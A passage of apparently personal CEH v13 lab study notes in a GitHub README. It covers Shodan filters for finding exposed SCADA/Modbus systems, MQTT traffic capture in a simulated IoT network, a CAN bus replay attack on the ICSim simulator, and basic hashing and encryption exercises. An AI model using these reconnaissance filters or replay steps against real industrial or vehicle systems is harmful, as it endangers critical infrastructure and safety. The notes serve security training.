- Similarly, you can gather additional information on a target device using the following Shodan filters:
  - Search for Modbus-enabled ICS/SCADA systems:
    - port:502
  - Search for SCADA systems using PLC name:
    - "Schneider Electric"
  - Search for SCADA systems using geolocation:
    - SCADA Country:"US"
- Using Shodan, you can obtain the details of SCADA systems that are used in water treatment plants, nuclear power plants, HVAC systems, electrical transmission systems, home heating systems

Capture and Analyze IoT Device Traffic

Capture and Analyze IoT Traffic using Wireshark :~
- MQTT port number = 1883
- To install the MQTT Broker on the Windows Server 2019
- open windows server 2019 and login
- install the Bevywise_MQTTRoute_4.exe file and install and launch
- The MQTTRoute will execute and the command prompt will appear. You can see the TCP port using 1883
- leave the Bevywise MQTT running
- switch to Windows Server 2022 machine
- install the Bevywise_IoTSimulator_3.exe in this mechine
- navigate to the C:\Bevywise\IotSimulator\bin directory and double-click on the runsimulator.bat file
- select Microsoft Edge browser and click OK to open the URL
```
       http://127.0.0.1:9000/setnetwork?network=HEALTH_CARE
```
- In the IoT Simulator, you can view the default network named HEALTH_CARE and several devices
- we will create a virtual IoT network and virtual IoT devices
  - in the +new network option
  - type any name and create network
- In the next screen, we will setup the Simulator Settings. Set the Broker IP Address as 10.10.1.19
- Do not change default settings and click on Save
- click on the Add blank Device button
- Create New Device popup opens. Type the device name (here, we use Temperature_Sensor), enter Device Id (here, we use TS1) and click enter
- The device will be added to the CEH_FINANCE_NETWORK
- To connect the Network and the added devices to the server or Broker, click on the Start Network red color circular icon in right corner
- When a connection is established between the network and the added devices and the web server or the MQTT Broker, the red button turns into green
- go to the 2019 machine and open this
```
      http://localhost:8080
```
  - username/password = admin/admin
- switch back to the 2022 machine and we will create the Subscribe command for the device Temperature_Sensor
- Click on the Plus icon in the top right corner and select the Subscribe to Command option
  - Subscribe on = on start
  - Topic tab = High_Tempe
  - Qos = 1 Atleast once
  - click save
- we will capture the traffic between the virtual IoT network and the MQTT Broker to monitor the secure communication using wireshark
- open the wireshark and select the ethernet interface in 2022 machine
- go back to the 2019 and click TS1 and send the message using subscriber command
  - Topic = High_Tempe
  - Message = Alert for High Temperature
  - submit
- come back to the 2022 machine and in the device log the sended message will came
- open the wireshark and in the filter type MQTT so all the MQTT are come
- expend and see the packet list pannel the information about the message is their
- Similarly you can select Ping Request, Ping Response and Publish Ack packets and observe the details

Perform IoT Attacks

Perform Replay Attack on CAN Protocol :~
- using CAN protocol
- open the ubuntu and type sudo su for root user
- The can-utils package is already installed on the system
- Now, to setup a virtual CAN interface issue following commands:
```
      sudo modprobe can
      sudo modprobe vcan
      sudo ip link add dev vcan0 type vcan
      sudo ip link set up vcan0
```
- To check whether Virtual CAN interface is setup successfully, run ifconfig
- vcan0 interface
- Run chmod -R 777 = ICSim to give permissions to the ICSim folder
- run cd ICSim
- exicute "make" command to create two executable files for IC Simulator and CANBus Control Panel
- Run ./icsim vcan0 to start the ICSim simulator
- Open a new terminal tab and execute sudo su to run the programs as a root user and cd ICSim
- Execute ./controls vcan0 to start the CANBus Control Panel
- we will start sniffer to capture the traffic sent to the ICSim Simulator by CANBus control panel simulator
- open the new terminal and sudo su and cd ICSim
- Execute cansniffer -c vcan0 = to start sniffing on the vcan0 interface
- open the new terminal and type sudo su and cd ICSim
- To capture the logs run = candump -l vcan0
- The .log file has been generated
- run canplayer -I candump-2024-05-07_063502.log and press enter

Cloud Computing

Perform Reconnaissance on Azure

Azure Reconnaissance with AADInternals :~

Cryptography

Encrypt the Information using Various Cryptography Tools

Perform Multi-layer Hashing using CyberChef :~
- open the windows 11 and create one text file and remane it and save that file with some words or information
- open the cyberchef using this link
```
      https://gchq.github.io/CyberChef/
```
- upload that text document by clicking Open file as input
- file is added to that cyberchef
- add the hashing MD%, SHA1 and other drag and drop all these in recip section
- in the output field you can get the cipertext
- we can set break point to the hash operation by clicking on the Set breakpoint button present in the Recipe
Perform File and Text Message Encryption using CryptoForge :~
- tool = CryptoForge
- extension of the encrypted file = .cfe
- open the windows 11 and enctrypt the file using cryptoforge tool
- assume that you are sending that encrypted file to someone
- in that another device you must enter the password for decrypt

Create a Self-signed Certificate

Create and Use Self-signed Certificates :~
- tool = Internet Information Services (IIS) Manager
- open the server 2019 and try to browse this website in https
```
      www.goodshopping.com
```
  - unable to oepn the page
- open the IIS in this server and go to SERVER2019 SERVER2019\Administrator under the commection
- In SERVER2019 Home, double-click Server Certificates in the IIS section
- click Create Self-Signed Certificate in action option
- in Create Self-Signed Certificate:
  - Specify a friendly name for the certificate = GoodShopping
  - Select a certificate store for the new certificate = personal
  - A newly created self-signed certificate will be displayed
- Expand the Sites node from the left-hand pane, and select GoodShopping
- Click Bindings in action section
- in site binding click add site binding window appears:
  - type = https
  - port = 443
  - IP address = your system ip address
  - host name = www.goodshopping.com
  - SSL certificate = GoodShopping
  - clicl ok
- The newly created SSL certificate is added to the Site Bindings
- refresh the GoodShopping once and open the brower and browse the same website with https
- it will now open with selt signed certificate

Perform Disk Encryption

Perform Disk Encryption using VeraCrypt :~
- tools = VeraCrypt
- setup the veracrypt in your system and in that time create one file like myvolume
- after installation select the virtual drive using created volume and mount that volume to the virtual drive
- storage any data or file in that virtual disk and demount and exit the veracrypt
- the virtual disk will be vanished
- if you want that virtual disk again open veracrypt and mount the volume agaun with password

Perform Cryptography using AI

Perform Cryptographic Techniques using ShellGPT :~

tool = sgpt
activate the sgpt using bash sgpt.sh command and with activation key

for calculate value of the given text:

      sgpt --shell "Calculate MD5 hash of text 'My Account number is 0234569198'"

we will perform multi-layer hasking using this command:

      sgpt --shell "Calculate MD5 hash of text 'My Account number is 0234569198' and calculate the SHA1 hash value of the MD5 value"

We will now calculate hash of a file using this command:

      sgpt --chat hash --shell "Calculate CRC32 hash of the file passwords.txt located at /home/attacker"

to perform basic encoding using this command

      sgpt --shell "Encode 'Hello World' text using base64 algorithm and save the result to Output.txt file"

if you want to open the Output.txt file use pluma Output.txt

decode the encoded data using this command:

      sgpt --shell "Decode the contents of encoded Output.txt file located at /home/attacker using base64 algorithm"

if you want to open decoded output use pluma Decoded Output.txt

Name		Name	Last commit message	Last commit date
Latest commit History 72 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CEH-V13-Notes

Footprinting and Reconnaissance

Scanning Networks

Enumeration

SNMP Enumaretion using SNMPwalk with SGPT :~

Vulnerability Analysis

System Hacking

Malware Threats

Sniffing

Social Engineering

Denial-of-Service

Session Hijacking

Evading IDS, Firewalls, and Honeypots

Hacking Web Servers

Hacking Web Applications

SQL Injection

Hacking Wireless Networks

Hacking Mobile Platforms

IoT and OT Hacking

Cloud Computing

Azure Reconnaissance with AADInternals :~

Cryptography

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Folders and files

Latest commit

History

Repository files navigation

CEH-V13-Notes

Footprinting and Reconnaissance

Scanning Networks

Enumeration

SNMP Enumaretion using SNMPwalk with SGPT :~

Vulnerability Analysis

System Hacking

Malware Threats

Sniffing

Social Engineering

Denial-of-Service

Session Hijacking

Evading IDS, Firewalls, and Honeypots

Hacking Web Servers

Hacking Web Applications

SQL Injection

Hacking Wireless Networks

Hacking Mobile Platforms

IoT and OT Hacking

Cloud Computing

Azure Reconnaissance with AADInternals :~

Cryptography

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Packages